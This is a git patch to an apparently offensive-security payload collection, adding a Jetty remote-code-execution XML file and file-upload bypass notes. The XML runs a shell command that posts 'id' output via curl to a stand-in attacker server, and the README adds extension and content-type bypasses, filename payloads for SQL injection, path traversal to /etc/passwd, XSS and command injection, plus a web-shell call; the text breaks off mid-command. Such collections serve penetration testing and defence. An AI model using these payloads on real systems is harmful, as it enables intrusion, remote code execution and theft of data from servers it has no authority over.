From fa849c00f234b3972aaa35622846ab50e97573ab Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 9 Aug 2022 22:05:45 +0200
Subject: [PATCH] Jetty RCE + Upload tricks
---
.../Jetty RCE/JettyShell.xml | 15 ++++++
Upload Insecure Files/README.md | 54 ++++++++++++++-----
2 files changed, 55 insertions(+), 14 deletions(-)
create mode 100644 Upload Insecure Files/Jetty RCE/JettyShell.xml
diff --git a/Upload Insecure Files/Jetty RCE/JettyShell.xml b/Upload Insecure Files/Jetty RCE/JettyShell.xml
new file mode 100644
index 0000000..769376c
--- /dev/null
+++ b/Upload Insecure Files/Jetty RCE/JettyShell.xml
@@ -0,0 +1,15 @@
+
+
+
+
+
+
+
+ - /bin/sh
+ - -c
+ - curl -F "r=`id`" http://yourServer:1337/
+
+
+
+
+
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index a6b11a9..3f5bfba 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -14,6 +14,7 @@
* [CVE - Image Tragik](#cve---image-tragik)
* [CVE - FFMpeg](#cve---ffmpeg)
* [ZIP Archive](#zip-archive)
+ * [Jetty RCE](#jetty-rce)
* [References](#references)
@@ -44,14 +45,22 @@
.phtm
.inc
```
-* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap`
-* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf`
+* ASP Server
+ ```powershell
+ .asp
+ .aspx
+ .config
+ .cer and .asa # (IIS <= 7.5)
+ shell.aspx;1.jpg # (IIS < 7.0)
+ shell.soap
+ ```
+* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`s
* Perl: `.pl, .pm, .cgi, .lib`
* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
### Upload tricks
-- Use double extensions : `.jpg.php`
+- Use double extensions : `.jpg.php, .png.php5`
- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
- Null byte (works well against `pathinfo()`)
@@ -63,7 +72,10 @@
* `.php\x00.jpg`
- Special characters
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
- * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
+ * Whitespace and new line characters
+ * `file.php%20`
+ * `file.php%0d%0a.jpg`
+ * `file.php%0a`
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
@@ -71,6 +83,7 @@
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
+ * Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
* Set the Content-Type twice: once for unallowed type and once for allowed.
- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
* Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
@@ -82,15 +95,21 @@
### Filename vulnerabilities
+Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename.
+
- Time-Based SQLi Payloads: e.g. `poc.js'(select*from(select(sleep(20)))a)+'.extension`
-- LFI Payloads: e.g. `image.png../../../../../../../etc/passwd`
+- LFI/Path Traversal Payloads: e.g. `image.png../../../../../../../etc/passwd`
- XSS Payloads e.g. `'">.extension`
- File Traversal e.g. `../../../tmp/lol.png`
- Command Injection e.g. `; sleep 10;`
+Also you upload:
+- HTML/SVG files to trigger an XSS
+- EICAR file to check the presence of an antivirus
+
### Picture upload with LFI
-Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
+Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
@@ -102,19 +121,20 @@ Create a custom picture and insert exif tag with `exiftool`. A list of multiple
```ps1
convert -size 110x110 xc:white payload.jpg
exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg
+exiftool -Comment="